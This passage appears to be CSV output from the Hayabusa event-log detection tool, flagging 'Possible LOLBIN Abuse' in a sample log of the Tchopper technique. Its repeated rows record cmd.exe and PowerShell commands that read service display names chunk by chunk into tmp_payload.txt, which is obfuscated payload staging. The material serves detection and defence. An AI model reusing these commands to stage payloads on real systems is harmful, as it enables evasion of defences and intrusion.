0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:06.713 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:06.728 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x61c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:08.194 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:08.194 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:09.644 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:09.644 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:11.108 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xed4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:11.124 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:12.598 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:12.598 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:14.049 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:14.065 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd 
Line: powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:15.496 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:15.511 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:16.954 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 
| User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:16.954 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:18.401 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:18.401 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:19.854 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:19.869 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:21.305 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:21.305 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xec0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:22.769 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:22.769 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:24.239 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\cmd.exe | PID: 0x32c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:24.239 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:25.692 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:25.708 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab4 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:27.141 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:27.157 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:28.605 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x844 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:28.605 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:30.058 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaa0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:30.074 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x704 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:31.535 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x20c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:31.535 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:32.988 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:32.988 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:34.429 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:34.429 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:35.880 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:35.896 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:37.347 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:37.347 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:38.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
